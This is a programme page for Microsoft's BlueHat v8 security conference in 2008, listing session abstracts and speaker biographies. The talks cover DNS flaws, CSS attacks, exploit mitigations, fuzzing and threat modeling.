BlueHat Security Briefings: Fall 2008 Sessions and Interviews
BlueHat v8: C3P0wned was held October 16-17, 2008, at the Microsoft corporate headquarters.
Sessions were a hybrid of content from in-depth technical security issues to innovative techniques and best practices to use in the information security realm.
The Microsoft Security Development Lifecycle (SDL) team hosted sessions emphasizing secure development and testing practices, as well as how to develop with security in mind from the beginning of the software development lifecycle. The BlueHat SDL sessions focused more on appropriate defense strategies and less on attack techniques. Sessions might include demonstrations of secure coding techniques or methods of using various security tools.
|View the BlueHat v8 General Sessions Keynote|
As senior vice president of the Windows Core Operating System Division, Jon DeVaan manages the engineering team responsible for creating the core components and architecture of Microsoft Windows.
DeVaan is a 24-year Microsoft veteran, and his extensive experience and knowledge have established him as a respected leader in the technology industry. DeVaan has held a variety of executive and management positions while at Microsoft. Prior to his current role, he started the corporate function of Engineering Excellence, across all Microsoft products.
Previously, DeVaan managed the TV Division at Microsoft, responsible for the UltimateTV service and the Microsoft TV software platform. DeVaan co-managed Microsoft's Consumer and Commerce Group, where he helped design and initiate the turnaround strategy for MSN. DeVaan led Microsoft's Desktop Applications Division, growing the business to US$7 billion in annual revenues. Responsible for the Microsoft Office family of applications and advanced application technologies, DeVaan led the initial design of Microsoft Office 2000, setting the direction of the product to seamlessly integrate Internet technologies and make them easier to use. In addition to serving as vice president of development and director of development for Office95 and 97, DeVaan worked in various capacities ranging from Excel software design engineer to development manager. His leadership and experience provided essential management of cross-platform technology and helped pioneer the development processes used to create Microsoft products. DeVaan has been a guest speaker at many events on the topic of software engineering and in the interactive and cable TV industries. Most notably, DeVaan served as a panelist with United Nations Secretary General Kofi Annan at the 2000 United Nations' World Television Forum to discuss the convergence of TV, digital technology, and the Internet.
DeVaan holds bachelor's degrees in mathematics and computer science from Oregon State University, and holds patents in the area of simplifying user interface elements in PC applications.
DeVaan serves as a trustee of the Oregon State University Foundation, as a technical advisor to the Oregon Innovation Council, and as an ambassador for United Way of King County.
|Modern Crimeware is a term coined to describe recent Web-related attacks. In the "old" days of virus and malware, the primary motive was fame. Modern Crimeware is fueled by financial motives and has evolved into an intricate economy of supply and demand, distributors, affiliations, and pricing models.|
With over 10 years of experience in the information security industry, Iftach Amit brings a mixture of software development, OS, network and Web security to Aladdin as the Director of Security Research for eSafe. Prior to Aladdin, Amit was Director of Security Research at Finjan--a Web security company. Earlier, Amit was the founder and CTO of a security startup in the IDS/IPS arena and developed new techniques for attack interception. He also served in a director position at Datavantage (NASDAQ:MCRS) with responsibility for software development and information security, as well as designing and building a financial datacenter. Prior to Datavantage, he managed the Internet application and UNIX departments at Comsec Consulting, where he consulted with major banking and industry companies worldwide. Amit holds a Bachelor’s degree in Computer Science and Business Administration from the Interdisciplinary Center at Herzlya.
In this presentation, we will show how the abundance of information on the Internet (using the “surface Web” as well as the “deep Web”) can be used to create a comprehensive profile of a person or a group/organization. The presentation will include a real world, live demonstration of the Maltego framework for data collection and correlation. The demo will cover collection and visualization of both open source and internal data sources and will show how n-th order relationships can be found and analyzed using the tool.
Next we will discuss (with live examples) how the lack of true identity on the Internet (using Web sites, social networks, e-mail, and IM) can result in the creation of virtual communities that can be used for anything from stock market manipulation to political gain. Finally, we will discuss possible solutions to the problem, and ways to detect and protect yourself.
Born in South Africa, Roelof Temmingh studied at the University of Pretoria and completed his Electronic Engineering degree in 1995. He worked as a developer, and later as a system architect at an information security engineering firm from 1995 to 2000. Early in 2000 he started the security assessment and consulting firm, SensePost, with some of the leading thinkers in the field. During his time at SensePost, he was the Technical Director in charge of the assessment team and later headed the Innovation Centre for the company. Temmingh spoke at various international conferences such as Black Hat, Defcon, CanSecWest, RSA, Ruxcon, HiTB, and FIRST. He also contributed to books such as Stealing the Network: How to Own a Continent, and Google Hacking for Penetration Testers, Volume 2, and was a lead trainer in the "Hacking by Numbers" training course. Temmingh authored the initial releases of several well known security testing applications such as Wikto, Crowbar, BiDiBLAH, and Suru. At the start of 2007, Temmingh founded Paterva in order to pursue his interest in research and development. Here he created the information collection, correlation, and visualization tool known as Maltego.
|DNS is at the heart of every network—when a Web site is browsed, DNS says where the site is, and when an e-mail is sent, DNS says where to. The answer provided by DNS is usually correct, but not always. Six months ago, it became clear that there was an ancient design flaw, present in the original 1983 specification for DNS, that would allow attackers to insert their own addresses for DNS names. An industry-wide bug hunt commenced, culminating in a simultaneous release date of patches for virtually all platforms. The presenters will talk about the issue, and about how a partnership between industry competitors and researchers helped protect all Web users.|
Dan Kaminsky is a longstanding speaker at the Black Hat Briefings, and will be delivering his ninth address this year. Dan has spent his entire career with Fortune 500 companies, having spent two years at Cisco, another two at Avaya, and most recently as a consultant for Microsoft. His research focuses on design characteristics of complex systems in order to make old systems do new things, and lately, to break new things in old ways. The Director of Penetration Testing for IOActive, Kaminsky is based in Seattle.
|CSS has many uses and abuses. Cascading Style Sheets (CSS) can be used for a lot more than making a Web site look sexy. The presenters will detail how to scan your internal network, track visited links on third-party Web sites, and read the content of third-party Web sites, such as your password. We will also discuss how to use CSS to detect the presence of plug-ins, detect access to certain zones or Web sites, show how algorithmic logic in CSS is possible, and finally demonstrate how CSS injections can be obfuscated to create difficult to detect cross-site scripting vectors. All of this will be demonstrated in a non-scripted environment.|
David Lindsay is a security engineer with Security Innovation, an application security company. David enjoys visiting museums with his 2-year-old daughter hacker, armchair politics, cryptography and researching Web vulnerabilities. David graduated from the University of Utah with a Master’s degree in Mathematics.
Gareth Heyes is based in the UK and specializes in Web application security and particularly likes hacking XSS Filters for fun. Gareth has created many online security tools and fuzzers, and is the developer of Hackvertor. He's married and has a 5-week-old daughter, and in his spare time enjoys playing 5-a-side football.
Eduardo Vela Nava
Eduardo Vela Nava is a student of Computer Sciences at ITESM CEM, Mexico, and a security engineer for hi5. Eduardo has been a Web application security researcher for the last couple of years, focusing on Web server and Web client vulnerabilities. Eduardo is co-administrator of the largest Spanish security community Web site (elhacker.net), and in his free time he loves playing piano.
|Software security research is an ideal area in which to feature information visualization techniques. This talk will discuss the latest in program visualization and show examples of ongoing research at universities and corporations worldwide. Several visualization techniques will be examined for usability in software security and a short discussion of graph layouts will illustrate the function and ideal use for each. Finally, internally developed processes for creating visualizations from data derived from static analysis will also be demonstrated.|
Richard Johnson is a computer security specialist with nearly a decade of professional experience. Currently employed by Microsoft, Richard works with the Security Engineering and Communications Division, tasked with reviewing the design and implementation of Microsoft's premier products including Microsoft Windows, Microsoft Office, and Windows Mobile.
Richard has been a public speaker at worldwide security events since 2004, presenting research on topics ranging from program analysis to system mitigation design. Richard has contributed public source code for binary integrity monitoring, system debugging, and reverse engineering. Richard is also the co-founder of The Uninformed Journal.
This presentation will focus on methods identified as high-risk components that need special attention in the form of design and code reviews. The presenter will be covering the following topics:
Ian Hellen is a Senior Security Engineer in Windows Security Assurance (a.k.a. SWI) at Microsoft. He is working on a toolset to help determine the security risk of code. Over the past 3 years he ran the security design reviews for Windows 7, Windows Server 2008, and Windows Vista. Prior to joining the Security Engineering Department, he was a security consultant in Microsoft Services for 7 years, working with enterprise customers on infrastructure and application security. He’s written a couple of (extremely obscure) books on wireless LAN security and other papers on various security topics, and he has spoken in some interesting places.
NOTE: The Suddenly Psychic: Knowing Everything About Everyone session by Nitesh Dhanjani and Akshay Aggarwal has been withdrawn from the Day 1 speaker lineup.
|View the SDL Sessions Keynote|
Scott Charney serves as corporate vice president of the Microsoft Trustworthy Computing (TwC) Group within the Core Operating System Division. The group’s mission is to drive Trustworthy Computing principles and processes within Microsoft and throughout the IT ecosystem. This includes working with business groups throughout the company to ensure their products and services uphold Microsoft security and privacy policies, controls, and best practices. The TwC group also collaborates with the rest of the computer industry and the government to increase public awareness, education, and other safeguards. In addition, Charney oversees Microsoft efforts to address critical infrastructure protection, engineering excellence, network security, and industry outreach about privacy and security.
Threat modeling is one of the most effective ways to build security into software. When we rolled out threat modeling to software development teams across EMC, we found that traditional approaches require security expertise and the ability to think like an attacker--characteristics that many software developers don't have. Over time, we developed a simple threat modeling approach that is tailored for use by software developers with only a basic level of security knowledge. The approach involves:
This approach has been effectively used for over a year at EMC. During the session, I will share details of the approach we developed to identify threats and assess risk as well as general insights from threat modeling at EMC.
Danny Dhillon currently serves as part of the EMC Product Security Office where he specializes in secure design. Prior to EMC, he worked at RSA Security on various enterprise security products. He is the author of ACM and IEEE conference publications on securing mobile ad hoc network routing and applied threshold cryptography.
Adam will present the Microsoft SDL threat modeling process with newly announced tooling. We are learning from mistakes in earlier approaches, and like the second Death Star, Microsoft threat modeling processes are adapting and evolving. Witness the awesome power of this fully armed and operational approach to discovering and analyzing threats before the code has been written.
Adam Shostack is senior program manager in the Security Engineering and Community Group at Microsoft. He is part of the Microsoft Security Development Lifecycle team, where he is responsible for security design analysis techniques.
Shostack joined Microsoft in 2006 with an extensive background in software security. Before Microsoft, he was involved in a number of successful startups focused on vulnerability scanning, privacy, and program analysis.
Shostack helped create the Common Vulnerabilities and Exposure (CVE) list and is now the Emeritus Advisor of the group. He also helped found both the International Financial Cryptography Association (IFCA) and the Privacy Enhancing Technologies Symposium, and has been a technical advisor to companies such as Counterpane Internet Security and Debix. Shostack has published articles in a variety of industry and academic venues and is also co-author of The New School of Information Security (Addison-Wesley, April 2008).
Reliable exploitation techniques for software vulnerabilities have been developed and refined over the past decade to the point that most classes of vulnerabilities can be trivially exploited. The sophistication of these exploitation techniques has warranted the development of equally sophisticated mitigations such as GS, DEP, and ASLR. This presentation explores the technical details of these developments by illustrating the logical evolution of Microsoft mitigations. This evolution will be shown in terms of which problem each mitigation is attempting to solve, the methods taken to solve it, and how well each mitigation has stood the test of time. This knowledge should provide attendees with a detailed understanding of how Microsoft mitigations currently work and how product teams can best take advantage of them.
Matt Miller has been an active member of the security research and development community where he focuses primarily on areas relating to exploitation technology and reverse engineering. Matt joined the Metasploit project in 2004 and contributed to the advancement of the Metasploit framework. Some of these advancements included the Meterpreter, VNC injection, and his work as a core developer on Metasploit 3.0. Matt is also an editor and contributor to the Uninformed Journal which is a free, community-driven outlet for new research. Matt's contributions to the journal have included papers on bypassing PatchGuard and DEP, as well as other techniques that can be used to improve or inhibit exploit reliability. In addition to his work with Metasploit and Uninformed, Matt also developed a functional implementation of Address Space Layout Randomization (ASLR) for Windows 2000, Windows XP, and Windows Server 2003 prior to the integration of ASLR into Windows Vista. Matt recently joined the Microsoft SWI Security Science team, where he is focused on program security analysis and mitigations.
Modern Web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable Web site in a matter of minutes. However, these attributes often encourage programming practices that make managing state difficult for a typical programmer.
Web application developers must carefully manage access to all resources that can be shared by threads. Global variables, session variables, backend systems, and application-specific data stores are common examples of such resources.
Concurrency flaws result when access to shared resources is not managed properly—something that is easy to do when the development environment purposefully encapsulates and abstracts the resources that need to be managed! Attackers take notice when manipulating those resources carries a security impact.
Each prevalent class of security flaw shares a common attribute: mistakes happen when doing the right thing is difficult. It is the opinion of the the presenters that concurrency flaws, especially in the context of Web applications, share this attribute. The presenters will provide insight into the ease with which concurrency flaws can be introduced into systems, offer guidance on evaluating the security impact of such flaws, and discuss strategies for eliminating such flaws that will be helpful to developers and testers alike.
Scott Stender is a founding partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at companies such as @stake and Microsoft. Scott is a noted researcher who focuses on secure software engineering and security analysis of core technologies. He holds a Bachelor of Science degree in Computer Engineering from the University of Notre Dame.
Alex Vidergar served as a development engineer in the United States Air Force for six years prior to working for iSEC Partners. Assigned originally to the training system product group, he managed standard development for network integration standards between distributed aircraft simulators (Distributed Mission Operations). He obtained a masters degree in Computer Engineering with a focus on computer networking security from the Air Force Institute of Technology. His master's thesis focused on security protocol analysis using the Strand Space formalism applied to Simple Public Key Infrastructure. He most recently worked at the Air Force Information Operations Center, Headquarters Air Intelligence Agency, where he managed system and network security assessments for classified applications and services.
This is a multi-part presentation shared between members of the SWI Tools team, discussing several aspects of Fuzzing: “How should I fuzz? When have I fuzzed enough? What do I do now that I’ve fuzzed?”
Jason Shirk will cover “How Should I Fuzz?” The SWI Tools team is responsible for providing tools across Microsoft to test for compliance with the SDL. Some areas, though important, are finite. Fuzzing approaches infinite numbers, types and methods of testing, and there is room (and necessity) for a number of tools. Certainly, not all fuzzers are created equal, but are their differences worse, or necessary? What should you look for in different types of fuzzers? What kind of commitment are you making when you chose a fuzzer? We will have completed the Fuzzing Olympics in time for this presentation, and I will make some comparisons between fuzzing models, and what we’ve found to be true at Microsoft in a smart vs. dumb fuzzing battle. The merits of several approaches, without giving out the exact specifics of how we test, will be discussed. The presenters do not intend to repeat Charlie Miller’s book here, but will show how it applies to software manufacturers, and discuss a type of blended approach to the space. Discussing approaches should then lead well into Lars’s presentation.
Lars Opstad will cover: “How Much Do I Fuzz? When Have I Fuzzed Enough?” The SWI Tools team ran a large fuzzing effort recently for a major Microsoft product. By running millions of manipulations and iterations across many machines, we discovered some things about fuzzing. There is a point of diminishing returns for fuzzing: at this point, most of the fuzzing effort can be stopped. Some late returns can still find very important issues, so designating a box to fuzz “forever” isn’t a bad idea. Indicators to use to determine when to decrease fuzzing depend on a number of factors, which will be covered in this presentation.
Dave Weinstein will cover: “What Do I Do Now That I’ve Fuzzed?”
Jason Shirk is a program manager on the SWI Tools team at Microsoft. His focus is the Microsoft Fuzzing Strategy, and he is responsible for a number of internal tools. Before coming to Microsoft, Jason worked in Telecom Security, and as a missionary in the Ukraine.
Lars Opstad is the Security group manager of the SWI Tools team. After spending the first 12 years of his Microsoft career in the Windows Testing organization, Lars came to the SWI Tools team in 2005 as team manager and leader of the Windows Vista Fuzzing Effort.
Dave Weinstein is a senior security developer on the SWI Tools team. After simulating blowing things up as a developer on such games as Rainbow Six, he was uniquely qualified to write the Fuzzer Common Library and blow up software across Microsoft.
The presenters will provide a thorough and objective review of the benefits, shortcomings, and trade-offs of static code analysis tools, black box application scanners, and expert analysis. This session is important for anyone involved with the security review of source code from management to developers.
Vincent Liu, CISSP, is the Managing Director at Stach & Liu, a professional services firm providing advanced IT security solutions to Fortune 500 companies, national law firms, and global financial institutions.
Before founding Stach & Liu, Vincent led the Attack & Penetration and Reverse Engineering teams for the Global Security unit at Honeywell International. In addition, he was a consultant with the Ernst & Young Advanced Security Centers and an analyst at the National Security Agency. In these roles Liu gained extensive experience conducting risk assessments, performing application code reviews, and supporting incident-response situations.
Vincent is a developer for the Metasploit Project and a respected member of the security community. He is an experienced speaker and has presented his research at conferences including Black Hat, ToorCon, and Microsoft BlueHat. Vincent has given interviews, and contributed to journals and books including: Penetration Tester’s Open Source Toolkit; Writing Security Tools and Exploits; Sockets, Shellcode, Porting, & Coding; and Hacking Exposed Wireless.
Vincent holds a Bachelor of Science and Engineering degree from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology.
|Q&A format topical panel discussion.|
Arian Evans is the Director of Operations at WhiteHat Security, leading a team of security engineers assessing over 600 production Web sites. Arian has worked at the forefront of Web application security for more than 10 years. His global projects include work with the Center for Internet Security, NIST, the FBI, the Secret Service, and many commercial organizations on Web application security and hacking incident-response.
Arian consistently researches and discloses new attack techniques and vulnerabilities in Web application software, including commercial platforms like Cisco and Nokia. Arian is a frequent speaker at industry conferences including Black Hat, OWASP, RSA, WASC, and software developer events and was a contributing author to Hacking Exposed Web Applications.
Mike Andrews is a principal at Foundstone, specializing in software security and leads the Web application security assessments and Ultimate Web Hacking classes. He brings with him a wealth of commercial and educational experience from both sides of the Atlantic and is a widely published author and speaker.
Before joining Foundstone, Mike was a freelance consultant and developer of Web-based information systems working with clients such as the Economist, British Airways, London transport authority and various UK universities. In 2002, after being an instructor and researcher for a number of years in the UK, Mike joined the Florida Institute of Technology as an assistant professor where he was responsible for research projects and independent security reviews for the Office of Naval Research, Air Force Research Labs and Microsoft Corporation.
Mike holds a PhD in Computer Science from the University of Kent at Canterbury in the United Kingdom where his focus was on debugging tools and programmer psychology.
Nathan McFeters is a Manager in Ernst & Young's Advanced Security Center (ASC) and is currently serving in a Security Evangelist role for the ASC based out of Chicago, Illinois. Nathan has performed Web application, deep source code, Internet, Intranet, wireless, dial-up, and social engineering engagements for several clients in the Fortune 500 during his career at Ernst & Young and has spoken at a number of prestigious conferences, including Black Hat, BlueHat, DEFCON, ToorCon, OWASP, and Hack in the Box. Nathan is also a veteran of the ZDNet Zero Day blog, where he has written about all topics related to security.
Bryan Sullivan is a Security Program Manager on the Security Development Lifecycle (SDL) team at Microsoft. He is a frequent speaker at industry events, including Black Hat, BlueHat, and RSA Conference. Bryan is also a published author on Web application security topics. His first book, AJAX Security, co-written with Billy Hoffman, was published by Addison-Wesley in 2007.